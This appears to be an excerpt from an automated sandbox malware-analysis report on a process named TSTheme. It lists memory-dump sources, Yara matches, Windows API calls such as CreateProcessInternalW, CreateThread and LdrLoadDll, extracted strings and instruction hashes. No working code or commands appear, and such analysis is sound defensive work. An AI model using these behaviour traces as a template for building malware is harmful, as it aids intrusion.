                                    • Associated: 0000000F.00000002.3663554386.000000000526E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_15_2_50d0000_TSTheme.jbxd
                                    Similarity
                                    • API ID: InitializeThunk
                                    • String ID:
                                    • API String ID: 2994545307-0
                                    • Opcode ID: b39f78631dc2991432aed0600c5296b6adf6ff622be261cce09127486d5f1992
                                    • Instruction ID: 3d1eb68f702592c7593d0455a45b6703e02590f4ce6772fb5ca4c2aefd80c139
                                    • Opcode Fuzzy Hash: b39f78631dc2991432aed0600c5296b6adf6ff622be261cce09127486d5f1992
                                    • Instruction Fuzzy Hash: 7E90022224545152D150715C85446164015A7E0211FA5C021B4915594D866989556621
                                    APIs
                                    • Sleep.KERNELBASE(000007D0), ref: 02FE2C6B
                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000000F.00000002.3657466018.0000000002FC0000.00000040.80000000.00040000.00000000.sdmp, Offset: 02FC0000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_15_2_2fc0000_TSTheme.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: Sleep
                                    • String ID: net.dll$wininet.dll
                                    • API String ID: 3472027048-1269752229
                                    • Opcode ID: bdadc0dac40b56115606484e8e2aceec8f339c11d014b895a33d309faf797cd4
                                    • Instruction ID: bec83efcb04a86689f6f92b5a06362ab36017df62225d378cdc27693374ef4c8
                                    • Opcode Fuzzy Hash: bdadc0dac40b56115606484e8e2aceec8f339c11d014b895a33d309faf797cd4
                                    • Instruction Fuzzy Hash: EB318BB1601704ABCB25EF64CC80FE7BBB9AB88754F10851CAA5E5B240D770BA40CFA1
                                    APIs
                                    • CoInitialize.OLE32(00000000), ref: 02FDEC57
                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000000F.00000002.3657466018.0000000002FC0000.00000040.80000000.00040000.00000000.sdmp, Offset: 02FC0000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_15_2_2fc0000_TSTheme.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: Initialize
                                    • String ID: @J7<
                                    • API String ID: 2538663250-2016760708
                                    • Opcode ID: 45be8e0665f91a66548f4b0290b3e1207ab626fac49afff0bc023e1aec409247
                                    • Instruction ID: f142aca2502d614469ce8f25e5e7f90b423a32c318309c442d6626b28289203e
                                    • Opcode Fuzzy Hash: 45be8e0665f91a66548f4b0290b3e1207ab626fac49afff0bc023e1aec409247
                                    • Instruction Fuzzy Hash: 7E3132B5A0060A9FDB10DF98DC809EEB7BABF88304B148559E615AB204D775AE05CFA0
                                    APIs
                                    • CoInitialize.OLE32(00000000), ref: 02FDEC57
                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000000F.00000002.3657466018.0000000002FC0000.00000040.80000000.00040000.00000000.sdmp, Offset: 02FC0000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_15_2_2fc0000_TSTheme.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: Initialize
                                    • String ID: @J7<
                                    • API String ID: 2538663250-2016760708
                                    • Opcode ID: 9363a6702421ab0f6ff2f8fd15f5a530115a55a30fbed5d1f59165347dfaf66a
                                    • Instruction ID: aa507aeaa28bbb2baf85e030d6e18631fc4cd2b1ff515ae9229f2f2d856bbcda
                                    • Opcode Fuzzy Hash: 9363a6702421ab0f6ff2f8fd15f5a530115a55a30fbed5d1f59165347dfaf66a
                                    • Instruction Fuzzy Hash: 713134B5A0060A9FDB00DFD8DC809EFB7BABF48304B144559E616EB214D775EE05CBA0
                                    Memory Dump Source
                                    • Source File: 0000000F.00000002.3657466018.0000000002FC0000.00000040.80000000.00040000.00000000.sdmp, Offset: 02FC0000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_15_2_2fc0000_TSTheme.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: 7cdbb073212cc2a369da66f7c783e2ca650cd8513bdb17ed23c4ebdca57cd041
                                    • Instruction ID: 63f9776dc010f9d8fce3a691561efd0878ace29cc3d4df93a379f823b3ace807
                                    • Opcode Fuzzy Hash: 7cdbb073212cc2a369da66f7c783e2ca650cd8513bdb17ed23c4ebdca57cd041
                                    • Instruction Fuzzy Hash: FA21BB72900602ABDF11CF78DC81BE7B7AAEB55780F588129E5189B205E330E551DFA0
                                    APIs
                                    • LdrLoadDll.NTDLL(00000000,00000000,?,?), ref: 02FD4532
                                    Memory Dump Source
                                    • Source File: 0000000F.00000002.3657466018.0000000002FC0000.00000040.80000000.00040000.00000000.sdmp, Offset: 02FC0000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_15_2_2fc0000_TSTheme.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: Load
                                    • String ID:
                                    • API String ID: 2234796835-0
                                    • Opcode ID: 0a5b46808d07e863b45c642623f8f10eb7d4fdfe879cc680468a100e3a6e7ddd
                                    • Instruction ID: b8c5916bd7ef0df48b58781edbdb01f40f9ac5b77529935fcf59b08073c41dcf
                                    • Opcode Fuzzy Hash: 0a5b46808d07e863b45c642623f8f10eb7d4fdfe879cc680468a100e3a6e7ddd
                                    • Instruction Fuzzy Hash: EA011EB9D0020EABDF10EAA4DC41F9EB7B9AB44348F0441A5AA0997240F671EB58CB91
                                    APIs
                                    • CreateProcessInternalW.KERNELBASE(02FD0FA1,02FD0FC9,02FD0DA1,00000000,02FD7D73,00000010,02FD0FC9,?,?,00000044,02FD0FC9,00000010,02FD7D73,00000000,02FD0DA1,02FD0FC9), ref: 02FE8463
                                    Memory Dump Source
                                    • Source File: 0000000F.00000002.3657466018.0000000002FC0000.00000040.80000000.00040000.00000000.sdmp, Offset: 02FC0000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_15_2_2fc0000_TSTheme.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: CreateInternalProcess
                                    • String ID:
                                    • API String ID: 2186235152-0
                                    • Opcode ID: c6e99a57c4e07f766d75fb7922e620f08570094a86bf9a7d7399b37cdde083c4
                                    • Instruction ID: cde839fdf56df2a3cc3a813519ebd1396e2b0e4e7e308617e5c810ae4d163ca4
                                    • Opcode Fuzzy Hash: c6e99a57c4e07f766d75fb7922e620f08570094a86bf9a7d7399b37cdde083c4
                                    • Instruction Fuzzy Hash: 3F018CB2205108BBCB44DE99DC80EEB77AEAF8C754F518208BA1DE3244D670F9518BA4
                                    APIs
                                    • CreateThread.KERNELBASE(00000000,00000000,-00000002,?,00000000,00000000), ref: 02FC96B5
                                    Memory Dump Source
                                    • Source File: 0000000F.00000002.3657466018.0000000002FC0000.00000040.80000000.00040000.00000000.sdmp, Offset: 02FC0000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_15_2_2fc0000_TSTheme.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: CreateThread
                                    • String ID:
                                    • API String ID: 2422867632-0
                                    • Opcode ID: 9e40194725a0dbd261c67ade3f25a02c07d3bc37d3a00c0c1f036b1131d42630
                                    • Instruction ID: 4bb5de2168bc46592f7cb081fd487a09970a2ef20d44b73ab7ab45f2b5bff2b6
                                    • Opcode Fuzzy Hash: 9e40194725a0dbd261c67ade3f25a02c07d3bc37d3a00c0c1f036b1131d42630
                                    • Instruction Fuzzy Hash: 2DF0653338020436E63165EA9D02FDB734C9B807A5F240029F70DDB1C0D5A1B5014AA8
                                    APIs
                                    • CreateThread.KERNELBASE(00000000,00000000,-00000002,?,00000000,00000000), ref: 02FC96B5
                                    Memory Dump Source
                                    • Source File: 0000000F.00000002.3657466018.0000000002FC0000.00000040.80000000.00040000.00000000.sdmp, Offset: 02FC0000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_15_2_2fc0000_TSTheme.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: CreateThread
                                    • String ID:
                                    • API String ID: 2422867632-0
                                    • Opcode ID: dde5df3f75148c663cdc4680fdee99d9dd0947639ec8543dcb2fd4b9232569c3
                                    • Instruction ID: b0c767e6e414cf56778e84d09a67cf823026b09d878a21de9b534b4cb7a94ca9
                                    • Opcode Fuzzy Hash: dde5df3f75148c663cdc4680fdee99d9dd0947639ec8543dcb2fd4b9232569c3
                                    • Instruction Fuzzy Hash: 59F09233780200B6E63176958D42FDB765D9F807A5F34001DF70DAB1C0D9A5B9018BA8
                                    APIs
                                    • RtlDosPathNameToNtPathName_U.NTDLL(?,?,?,?), ref: 02FE7040
                                    Memory Dump Source
                                    • Source File: 0000000F.00000002.3657466018.0000000002FC0000.00000040.80000000.00040000.00000000.sdmp, Offset: 02FC0000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_15_2_2fc0000_TSTheme.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: Path$NameName_
                                    • String ID:
                                    • API String ID: 3514427675-0
                                    • Opcode ID: 027390277e231c9ef91be817d0851fd10d4170f76ba3d1588b18670b920579f9
                                    • Instruction ID: e3e70d44d240888f9ba037962c8bf3a7b80f78516f59c5754f0247b1730e76f5
                                    • Opcode Fuzzy Hash: 027390277e231c9ef91be817d0851fd10d4170f76ba3d1588b18670b920579f9
                                    • Instruction Fuzzy Hash: 7CF039B6200609BBCA10EF59DC41FEBB7ADEFC9760F504509FA08A7241C670B9118BF4
                                    APIs
                                    • RtlFreeHeap.NTDLL(00000000,00000004,00000000,1A5FE856,00000007,00000000,00000004,00000000,02FD3D9B,000000F4,?,?,?,?,?), ref: 02FE83AC
                                    Memory Dump Source
                                    • Source File: 0000000F.00000002.3657466018.0000000002FC0000.00000040.80000000.00040000.00000000.sdmp, Offset: 02FC0000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_15_2_2fc0000_TSTheme.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: FreeHeap
                                    • String ID:
                                    • API String ID: 3298025750-0
                                    • Opcode ID: d665bb28e766b405ad5b769d439b243b610f19b16aa710fa6b14fc68fb677987
                                    • Instruction ID: 48e283c90901c9ff534956a0c8646c025856b416138431fbe017a6eac62bc287
                                    • Opcode Fuzzy Hash: d665bb28e766b405ad5b769d439b243b610f19b16aa710fa6b14fc68fb677987
                                    • Instruction Fuzzy Hash: CEE06D762002047BD610EE59DC41F9B73ADEFC9B50F104409FA08A7241D670B9148BB4
                                    APIs
                                    • RtlAllocateHeap.NTDLL(02FD1709,?,02FE492B,02FD1709,02FE4697,02FE492B,?,02FD1709,02FE4697,00001000,?,?,02FE9C00), ref: 02FE835F
                                    Memory Dump Source
                                    • Source File: 0000000F.00000002.3657466018.0000000002FC0000.00000040.80000000.00040000.00000000.sdmp, Offset: 02FC0000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_15_2_2fc0000_TSTheme.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: AllocateHeap
                                    • String ID:
                                    • API String ID: 1279760036-0
                                    • Opcode ID: 2cbc616066dca2fff9d95f765f5f3f61b90155f19f2508db422bbec96e683eca
                                    • Instruction ID: 3b7e196fcf7b3c0e756abea6f7a68d5a7d656c09781f68993b3a57da9a63e751
                                    • Opcode Fuzzy Hash: 2cbc616066dca2fff9d95f765f5f3f61b90155f19f2508db422bbec96e683eca
                                    • Instruction Fuzzy Hash: B8E09AB62002097BCA10EE98DC40FEB73ADEFC9750F404409FA08A7241D6B0B9108BB8
                                    APIs
                                    • GetFileAttributesW.KERNELBASE(?,?,?,?,000004D8,00000000), ref: 02FD7DDC
                                    Memory Dump Source
                                    • Source File: 0000000F.00000002.3657466018.0000000002FC0000.00000040.80000000.00040000.00000000.sdmp, Offset: 02FC0000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_15_2_2fc0000_TSTheme.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: AttributesFile
                                    • String ID:
                                    • API String ID: 3188754299-0
                                    • Opcode ID: c9daf9210e734d12ac4972cffec731b4a0f913956132cd96feb1503f1371cb35
                                    • Instruction ID: 187ea8849eed2e99cc161ed3dc7f85ae1b01843a9ba9e348cd15cddc6b424070
                                    • Opcode Fuzzy Hash: c9daf9210e734d12ac4972cffec731b4a0f913956132cd96feb1503f1371cb35
                                    • Instruction Fuzzy Hash: 19E026316402082FFB207AA8DC45F7733498B487A8F2C0668BE5DCF2C1E239F9018550
                                    APIs
                                    • SetErrorMode.KERNELBASE(00008003,?,?,02FD19F0,02FE6DB7,02FE4697,?), ref: 02FD7BF3
                                    Memory Dump Source
                                    • Source File: 0000000F.00000002.3657466018.0000000002FC0000.00000040.80000000.00040000.00000000.sdmp, Offset: 02FC0000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_15_2_2fc0000_TSTheme.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: ErrorMode
                                    • String ID:
                                    • API String ID: 2340568224-0
                                    • Opcode ID: 266db321dd7d4af4296effd2585e65640b70d0af487c48bf808b05aac7227ce0
                                    • Instruction ID: 2ebd99215571875cffe8e9da873c54d4e51ccbb375902f66d7942d9ecf0fec1f
                                    • Opcode Fuzzy Hash: 266db321dd7d4af4296effd2585e65640b70d0af487c48bf808b05aac7227ce0
                                    • Instruction Fuzzy Hash: 82D05E716802053BF611E6E5CC06F6B328D5B047D8F184078BA0CDB2C2E966F5214DA9
                                    APIs
                                    • PostThreadMessageW.USER32(?,00000111), ref: 02FD0B67
                                    Memory Dump Source
                                    • Source File: 0000000F.00000002.3657466018.0000000002FC0000.00000040.80000000.00040000.00000000.sdmp, Offset: 02FC0000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_15_2_2fc0000_TSTheme.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: MessagePostThread
                                    • String ID:
                                    • API String ID: 1836367815-0
                                    • Opcode ID: cd11d55857e50e9293af255402c5c86e331596148f99e511fa3e3e30c6db0de7
                                    • Instruction ID: 2a687eb386f8fbba2f23a956985223de007968dbfd4034580ff57b2a841a102d
                                    • Opcode Fuzzy Hash: cd11d55857e50e9293af255402c5c86e331596148f99e511fa3e3e30c6db0de7
                                    • Instruction Fuzzy Hash: 57D0C967B4111C7AAA125595ACC1EFEB76CEBC5AAAF004067FB08E6140EA6199060AB1
                                    APIs
                                    Memory Dump Source
                                    • Source File: 0000000F.00000002.3663554386.00000000050D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 050D0000, based on PE: true
                                    • Associated: 0000000F.00000002.3663554386.00000000051F9000.00000040.00001000.00020000.00000000.sdmp
                                    • Associated: 0000000F.00000002.3663554386.00000000051FD000.00000040.00001000.00020000.00000000.sdmp
                                    • Associated: 0000000F.00000002.3663554386.000000000526E000.00000040.00001000.00020000.00000000.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_15_2_50d0000_TSTheme.jbxd
                                    Similarity
                                    • API ID: InitializeThunk
                                    • String ID:
                                    • API String ID: 2994545307-0
                                    • Opcode ID: 5ea48239423a87f54743bf387756d496164071ea795c198f8f8480ecc0a3c4cc
                                    • Instruction ID: 7375ada1694ce9416e0dead340e3ab7c2df1f8b4c813d52c631f9efd85916ea0
                                    • Opcode Fuzzy Hash: 5ea48239423a87f54743bf387756d496164071ea795c198f8f8480ecc0a3c4cc
                                    • Instruction Fuzzy Hash: 68B09B729015C5D5DA11E7604708B27791177D0711F75C461F2130641E477CC1D1E975
                                    APIs
                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000000F.00000002.3663554386.00000000050D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 050D0000, based on PE: true
                                    • Associated: 0000000F.00000002.3663554386.00000000051F9000.00000040.00001000.00020000.00000000.sdmp
                                    • Associated: 0000000F.00000002.3663554386.00000000051FD000.00000040.00001000.00020000.00000000.sdmp
                                    • Associated: 0000000F.00000002.3663554386.000000000526E000.00000040.00001000.00020000.00000000.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_15_2_50d0000_TSTheme.jbxd
                                    Similarity
                                    • API ID: ___swprintf_l
                                    • String ID: :%u.%u.%u.%u$::%hs%u.%u.%u.%u$::ffff:0:%u.%u.%u.%u$ffff:
                                    • API String ID: 48624451-2108815105
                                    • Opcode ID: e8d3a1d9c71a1fcaabf554d8b00ec520292f6426ddb0f197dc3142a67637ceff
                                    • Instruction ID: d5b527642cdcdf60982581897910226d151ce608a9786a8d3dd7eb4d01d48bec
                                    • Opcode Fuzzy Hash: e8d3a1d9c71a1fcaabf554d8b00ec520292f6426ddb0f197dc3142a67637ceff
                                    • Instruction Fuzzy Hash: E251A5B6A04216BFCB24DF9CC99097EFBB9BB08240F549269F475D7641D374DE808BA0
                                    APIs
                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000000F.00000002.3663554386.00000000050D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 050D0000, based on PE: true
                                    • Associated: 0000000F.00000002.3663554386.00000000051F9000.00000040.00001000.00020000.00000000.sdmp
                                    • Associated: 0000000F.00000002.3663554386.00000000051FD000.00000040.00001000.00020000.00000000.sdmp
                                    • Associated: 0000000F.00000002.3663554386.000000000526E000.00000040.00001000.00020000.00000000.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_15_2_50d0000_TSTheme.jbxd
                                    Similarity
                                    • API ID: ___swprintf_l
                                    • String ID: :%u.%u.%u.%u$::%hs%u.%u.%u.%u$::ffff:0:%u.%u.%u.%u$ffff:
                                    • API String ID: 48624451-2108815105
                                    • Opcode ID: b4a5ca1375a4bb9bdfd7755e095593cd62c6e5d93a7dbc06623161b7da6da449
                                    • Instruction ID: fe84fa8dac265cd51a2423b7d57493fe8e92adfdb8e0b4929c3dcd7fbc786e84
                                    • Opcode Fuzzy Hash: b4a5ca1375a4bb9bdfd7755e095593cd62c6e5d93a7dbc06623161b7da6da449
                                    • Instruction Fuzzy Hash: EF51F679A04645AEEB34DE9CC8909FFB7FAEB48200B048859E5E6C7A41D7F4DE44C760
                                    Strings
                                    • CLIENT(ntdll): Processing section info %ws..., xrefs: 05174787
                                    • CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions, xrefs: 05174655
                                    • ExecuteOptions, xrefs: 051746A0
                                    • Execute=1, xrefs: 05174713
                                    • CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database, xrefs: 051746FC
                                    • CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ, xrefs: 05174725
                                    • CLIENT(ntdll): Processing %ws for patching section protection for %wZ, xrefs: 05174742
                                    Memory Dump Source
                                    • Source File: 0000000F.00000002.3663554386.00000000050D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 050D0000, based on PE: true
                                    • Associated: 0000000F.00000002.3663554386.00000000051F9000.00000040.00001000.00020000.00000000.sdmp
                                    • Associated: 0000000F.00000002.3663554386.00000000051FD000.00000040.00001000.00020000.00000000.sdmp
                                    • Associated: 0000000F.00000002.3663554386.000000000526E000.00000040.00001000.00020000.00000000.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_15_2_50d0000_TSTheme.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID: CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions$CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ$CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database$CLIENT(ntdll): Processing %ws for patching section protection for %wZ$CLIENT(ntdll): Processing section info %ws...$Execute=1$ExecuteOptions
                                    • API String ID: 0-484625025
                                    • Opcode ID: e6f7b732a43a9094e5328d316bf4a0c00518ec5e6e6ddeb0da829a00f43c1ae1
                                    • Instruction ID: f6ece3d6596688bf8c1142900bcfae8b70698413593aba40f23cc7f228dd3199
                                    • Opcode Fuzzy Hash: e6f7b732a43a9094e5328d316bf4a0c00518ec5e6e6ddeb0da829a00f43c1ae1
                                    • Instruction Fuzzy Hash: 1E51C6B1B042197AEF21EAA4ACAAFBD77A9EB04310F1400A9E505AB1D1DB719B45CF50
                                    APIs
                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000000F.00000002.3663554386.00000000050D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 050D0000, based on PE: true
                                    • Associated: 0000000F.00000002.3663554386.00000000051F9000.00000040.00001000.00020000.00000000.sdmp
                                    • Associated: 0000000F.00000002.3663554386.00000000051FD000.00000040.00001000.00020000.00000000.sdmp
                                    • Associated: 0000000F.00000002.3663554386.000000000526E000.00000040.00001000.00020000.00000000.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_15_2_50d0000_TSTheme.jbxd
                                    Similarity
                                    • API ID: __aulldvrm
                                    • String ID: +$-$0$0
                                    • API String ID: 1302938615-699404926
                                    • Opcode ID: 53abcd45f1248799eb7edd6da4205106d70e70754ef1e870ff48280e40c18d32
                                    • Instruction ID: 3e350fc2c89c5f6920c2cb2949ef8a9bf14dfaa3ce250bc034794579206dd6ad
                                    • Opcode Fuzzy Hash: 53abcd45f1248799eb7edd6da4205106d70e70754ef1e870ff48280e40c18d32
                                    • Instruction Fuzzy Hash: D0818E70A0D2499ADF28DF68C891BFEBBA2BF45320F186159D892A72D1C734D841CF54
                                    Strings
                                    • RTL: Enter CriticalSection Timeout (%I64u secs) %d, xrefs: 051702BD
                                    • RTL: Re-Waiting, xrefs: 0517031E
                                    • RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u, xrefs: 051702E7
                                    Memory Dump Source
                                    • Source File: 0000000F.00000002.3663554386.00000000050D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 050D0000, based on PE: true
                                    • Associated: 0000000F.00000002.3663554386.00000000051F9000.00000040.00001000.00020000.00000000.sdmp
                                    • Associated: 0000000F.00000002.3663554386.00000000051FD000.00000040.00001000.00020000.00000000.sdmp
                                    • Associated: 0000000F.00000002.3663554386.000000000526E000.00000040.00001000.00020000.00000000.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_15_2_50d0000_TSTheme.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID: RTL: Enter CriticalSection Timeout (%I64u secs) %d$RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u$RTL: Re-Waiting
                                    • API String ID: 0-2474120054
                                    • Opcode ID: 83bf1c76056031c28666927a8d88834c60eee1e366b3a8a479af68461b47e684
                                    • Instruction ID: 3a2c17c25fbdd7c779cf4f903123d7aaac463f0315a398cc7bc18734746b4d0a
                                    • Opcode Fuzzy Hash: 83bf1c76056031c28666927a8d88834c60eee1e366b3a8a479af68461b47e684
                                    • Instruction Fuzzy Hash: 6EE1BD316087419FD724CF28C889B2AB7F2FB88724F144A5DF5A68B2D1D774E856CB42
                                    Strings
                                    • RTL: Resource at %p, xrefs: 05177B8E
                                    • RTL: Acquire Exclusive Sem Timeout %d (%I64u secs), xrefs: 05177B7F
                                    • RTL: Re-Waiting, xrefs: 05177BAC
                                    Memory Dump Source
                                    • Source File: 0000000F.00000002.3663554386.00000000050D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 050D0000, based on PE: true
                                    • Associated: 0000000F.00000002.3663554386.00000000051F9000.00000040.00001000.00020000.00000000.sdmp
                                    • Associated: 0000000F.00000002.3663554386.00000000051FD000.00000040.00001000.00020000.00000000.sdmp
                                    • Associated: 0000000F.00000002.3663554386.000000000526E000.00000040.00001000.00020000.00000000.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_15_2_50d0000_TSTheme.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID: RTL: Acquire Exclusive Sem Timeout %d (%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
                                    • API String ID: 0-871070163
                                    • Opcode ID: 43f74a8d58ab94b97a0bcac4ba75c66dbc8e5f2039b6a38e2ad669b74dd40174
                                    • Instruction ID: 28f68f397be057ecd37fc11c1d4e8855c5741b7bf5a6559d3a565b234da481f0
                                    • Opcode Fuzzy Hash: 43f74a8d58ab94b97a0bcac4ba75c66dbc8e5f2039b6a38e2ad669b74dd40174
                                    • Instruction Fuzzy Hash: 7741E2313097069FC724DE29C851F6AB7E6FF88720F100A2DE95A9B681EB30E4058B91
                                    APIs
                                    • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0517728C
                                    Strings
                                    • RTL: Resource at %p, xrefs: 051772A3
                                    • RTL: Acquire Shared Sem Timeout %d(%I64u secs), xrefs: 05177294
                                    • RTL: Re-Waiting, xrefs: 051772C1
                                    Memory Dump Source
                                    • Source File: 0000000F.00000002.3663554386.00000000050D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 050D0000, based on PE: true
                                    • Associated: 0000000F.00000002.3663554386.00000000051F9000.00000040.00001000.00020000.00000000.sdmp
                                    • Associated: 0000000F.00000002.3663554386.00000000051FD000.00000040.00001000.00020000.00000000.sdmp
                                    • Associated: 0000000F.00000002.3663554386.000000000526E000.00000040.00001000.00020000.00000000.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_15_2_50d0000_TSTheme.jbxd
                                    Similarity
                                    • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
                                    • String ID: RTL: Acquire Shared Sem Timeout %d(%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
                                    • API String ID: 885266447-605551621
                                    • Opcode ID: 0f65ef2c5dcba8bbc5ea9858a067ded8de3e6e006744f0ce98533d54c4790465
                                    • Instruction ID: 83f9c0e4c95007b11cbbeeb9236530971de9de130ee5f0b533bb8cddfd78e025
                                    • Opcode Fuzzy Hash: 0f65ef2c5dcba8bbc5ea9858a067ded8de3e6e006744f0ce98533d54c4790465
                                    • Instruction Fuzzy Hash: 2041F531708206ABC725DE29CC45F6AB7B6FF44710F100A19F966EB280EB31E856CBD1
                                    APIs
                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000000F.00000002.3663554386.00000000050D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 050D0000, based on PE: true
                                    • Associated: 0000000F.00000002.3663554386.00000000051F9000.00000040.00001000.00020000.00000000.sdmp
                                    • Associated: 0000000F.00000002.3663554386.00000000051FD000.00000040.00001000.00020000.00000000.sdmp
                                    • Associated: 0000000F.00000002.3663554386.000000000526E000.00000040.00001000.00020000.00000000.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_15_2_50d0000_TSTheme.jbxd
                                    Similarity
                                    • API ID: ___swprintf_l
                                    • String ID: %%%u$]:%u
                                    • API String ID: 48624451-3050659472
                                    • Opcode ID: 3ca2cf1a2b50daa1fedc2e71b679cae8b21c082e891fa36e51e972bf7c8bafe4
                                    • Instruction ID: c449fcaa391eb9c211b9c614fc6b0e7a4fef0a3ae3c520679a904f7fc0b77587
                                    • Opcode Fuzzy Hash: 3ca2cf1a2b50daa1fedc2e71b679cae8b21c082e891fa36e51e972bf7c8bafe4
                                    • Instruction Fuzzy Hash: 84318676A002199FDB20DF29DC44FEEB7B8FB48610F440555E859E3240EB709A498FA0
                                    APIs
                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000000F.00000002.3663554386.00000000050D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 050D0000, based on PE: true
                                    • Associated: 0000000F.00000002.3663554386.00000000051F9000.00000040.00001000.00020000.00000000.sdmp
                                    • Associated: 0000000F.00000002.3663554386.00000000051FD000.00000040.00001000.00020000.00000000.sdmp
                                    • Associated: 0000000F.00000002.3663554386.000000000526E000.00000040.00001000.00020000.00000000.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_15_2_50d0000_TSTheme.jbxd
                                    Similarity
                                    • API ID: __aulldvrm
                                    • String ID: +$-
                                    • API String ID: 1302938615-2137968064
                                    • Opcode ID: 0e72ee8b5e9315034f2b46ff5b251d52fedc42f24a18d50ff17db184198f4ea1
                                    • Instruction ID: 660b9687734a44c518c26c5f2d5c95e86550e645338c26a1c83bf47a71eff021
                                    • Opcode Fuzzy Hash: 0e72ee8b5e9315034f2b46ff5b251d52fedc42f24a18d50ff17db184198f4ea1
                                    • Instruction Fuzzy Hash: CB91B870E042159FDF24DF69C890ABEB7A6FF44720F54661AE865E72C0D73499838F50
                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000000F.00000002.3663554386.00000000050D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 050D0000, based on PE: true
                                    • Associated: 0000000F.00000002.3663554386.00000000051F9000.00000040.00001000.00020000.00000000.sdmp
                                    • Associated: 0000000F.00000002.3663554386.00000000051FD000.00000040.00001000.00020000.00000000.sdmp
                                    • Associated: 0000000F.00000002.3663554386.000000000526E000.00000040.00001000.00020000.00000000.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_15_2_50d0000_TSTheme.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID: $$@
                                    • API String ID: 0-1194432280
                                    • Opcode ID: 35e748af9864ed91e9dd435fb5e172cfc13e5171754d05b586b612fa1bb3cd7a
                                    • Instruction ID: 99ac2f464ccaa6b565ac5e2cfbdcc202a788d0568bfa1245b4c5f61f4158f4e9
                                    • Opcode Fuzzy Hash: 35e748af9864ed91e9dd435fb5e172cfc13e5171754d05b586b612fa1bb3cd7a
                                    • Instruction Fuzzy Hash: CB814B75E012699BDB35DB54CC44BEEB7B5AF08750F0041EAE91AB7281D7709E84CFA0